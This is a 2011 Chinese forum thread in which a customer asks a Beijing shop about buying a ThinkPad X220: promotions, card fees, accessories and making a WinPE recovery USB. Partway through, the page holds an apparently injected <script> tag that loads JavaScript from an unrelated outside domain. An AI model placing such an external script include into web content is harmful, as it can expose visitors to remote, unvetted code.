开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服
楼主: zhijiazhan

购机前咨询 谢谢

购机前咨询 谢谢

刷卡有手续费,楼下有银行
如果活动里包含,那些东西就是套餐里的,白送~~

★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

购机前咨询 谢谢

你好
来之前还是电话联系一下比较好的
一般提前一天联系就可以了
可以支持刷卡,有1%手续费,最好是现金
活动里面如果是选蓝牙鼠标,需要加128元

购机前咨询 谢谢

最好提前电话预定一下,这样能保证你去了后有机器,
以前交现金,周围银行挻多的,比较方便

购机前咨询 谢谢

大部分都是现金

购机前咨询 谢谢

晓丁 发表于 2011-11-10 10:07
你好
来之前还是电话联系一下比较好的
一般提前一天联系就可以了

现在的活动不是有两种么,第二种活动中不是说键盘膜内胆还可以有蓝牙鼠么?

购机前咨询 谢谢

是的啊,活动左面或者是右面只能选一面的
如果是右面选蓝牙鼠标是可以的
如果左面的是要加128元的

购机前咨询 谢谢

晓丁 发表于 2011-11-10 10:16
是的啊,活动左面或者是右面只能选一面的
如果是右面选蓝牙鼠标是可以的
如果左面的是要加128元的 ...

噢,明白了。那系统恢复U盘是否很必要么?我如果选右边的活动 那就没了恢复U盘了

购机前咨询 谢谢

如果买X系列笔记本,没光驱,装系统会比较麻烦。有个优盘会很方便。自带优盘也行。给你做个恢复盘

购机前咨询 谢谢

黑音 发表于 2011-11-10 10:38
如果买X系列笔记本,没光驱,装系统会比较麻烦。有个优盘会很方便。自带优盘也行。给你做个恢复盘 ...

也可以自带U盘啊,那很好
容量要多大的呢?8G的才行么?

购机前咨询 谢谢

zhijiazhan 发表于 2011-11-10 11:09
也可以自带U盘啊,那很好
容量要多大的呢?8G的才行么?

u盘多大的都可以有300M足够了
在u盘里面做个winpe的系统就可以了,用它来引导进winpe系统,运行ghost软件
win7的镜像文件可以存放在硬盘上的

购机前咨询 谢谢

真专业~~

购机前咨询 谢谢

晓丁 发表于 2011-11-10 11:20
在u盘里面做个winpe的系统就可以了,用它来引导进winpe系统,运行ghost软件 ...

太专业了!
那我就自带个4G的U盘去做系统了
另外XY的单肩包多少米一个啊?我选激光鼠跟键盘膜的话就没得包了,只能买一个

购机前咨询 谢谢

顶一下!!

购机前咨询 谢谢

zhijiazhan 发表于 2011-11-10 11:52
太专业了!
那我就自带个4G的U盘去做系统了
另外XY的单肩包多少米一个啊?我选激光鼠跟键盘膜的话就没得 ...

单间皮包199,其他的100.

购机前咨询 谢谢

配件需要的多的话可以买一些便宜的,送一些贵的,这样较值一些

购机前咨询 谢谢

EddieFan 发表于 2011-11-10 13:46
配件需要的多的话可以买一些便宜的,送一些贵的,这样较值一些

这个主意很不错,谢谢啦
那我就14号去万达购机了

购机前咨询 谢谢

如果定了14号过来,就直接过来吧
这个型号目前是现货

购机前咨询 谢谢

晓丁 发表于 2011-11-10 14:19
如果定了14号过来,就直接过来吧
这个型号目前是现货

肯定是14号了,那我到时就直接过去哈,大概会在11点半左右吧,下午2点南站的高铁,我得留出时间来,估计得占用你们午饭时间了

购机前咨询 谢谢

哈哈,提前感谢惠顾啦。从我们这里坐1小时地铁就可以到南站了。

购机前咨询 谢谢

zhijiazhan 发表于 2011-11-10 15:42
肯定是14号了,那我到时就直接过去哈,大概会在11点半左右吧,下午2点南站的高铁,我得留出时间来,估计 ...

时间还挺紧的,你可以加我qq,把您的要求说一下(比如活动都要什么,做什么系统,分几个区)我提前给你搞定
你来看下机器没问题就可以直接拿走了

购机前咨询 谢谢

晓丁满心欢喜,哈哈

购机前咨询 谢谢

服务就是好

购机前咨询 谢谢

现金是王道

购机前咨询 谢谢

多买些便宜的,送贵的这个好

便宜的也买不起。。。  发表于 2011-11-11 09:39
上图才是正道  发表于 2011-11-11 09:30

购机前咨询 谢谢

晓丁 发表于 2011-11-10 11:20
在u盘里面做个winpe的系统就可以了,用它来引导进winpe系统,运行ghost软件 ...

谢谢各位老大了啊,我昨天下班去电脑城看了下,觉得12.5的尺寸似乎太小了点,看着不给力
目前又在犹豫了,想入T420S。。。。。
还好昨天没有加你QQ告诉你直接帮我装X220
顺便再问一下,X220与T420S相比,重量上有多大出入呢?